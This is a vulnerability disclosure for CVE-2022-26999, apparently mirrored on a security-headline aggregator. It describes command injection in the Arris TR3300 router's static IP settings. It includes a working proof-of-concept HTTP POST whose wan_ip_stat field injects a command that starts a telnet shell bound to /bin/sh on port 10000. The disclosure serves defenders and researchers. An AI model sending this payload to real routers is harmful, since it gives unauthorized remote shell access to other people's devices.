Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-26999: my_vuln/8.md at main · wudipjq/my_vuln

Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the static ip settings function via the wan_ip_stat, wan_mask_stat, wan_gw_stat, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

CVE
Open in Source
#vulnerability#web#ubuntu#linux#git

ARRIS Vulnerability

Vendor:ARRIS

Product:TR3300

Version:1.0.13(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000OlZ68AAF&c=SURFboard%20Routers)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an Command Injection vulnerability in ARRIS router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In setup.cgi binary:

In the router’s static ip settings function(wan_stat.html), wan_ip_stat、wan_mask_stat、wan_gw_stat、wan_dns1_stat is directly passed by the attacker, so we can control the wan_ip_stat、wan_mask_stat、wan_gw_stat、wan_dns1_stat to attack the OS.

First, accept and process the content of the field(fix_ipaddr、fix_netmask、fix_gateway、wan_dns1), and then call the function nvram_set to store this input.

In rc_apps binary:

As you can see here, in sub_40DBFC、sub_40DEF8 function, the initial input will be extracted.

Eventually, in sub_4077BC、sub_407590 function, the initial input will cause command injection.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set wan_ip_stat as /usr/sbin/utelnetd -l /bin/sh -p 10000, and the router will excute it,such as:

POST /setup.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 274 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/wan_stat.html Upgrade-Insecure-Requests: 1

static_ip_enable=&wan_ip_stat=`/usr/sbin/utelnetd -l /bin/sh -p 10000`&wan_mask_stat=255.255.255.0&wan_gw_stat=192.168.0.1&stat_mtu=1500&submit=Apply&h_wan_encapmode=static&todo=save&this_file=wan_stat.html&next_file=wan_dns.html&message=&h_static_ip_enable=enable&todo=save

Result

Get a shell!

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE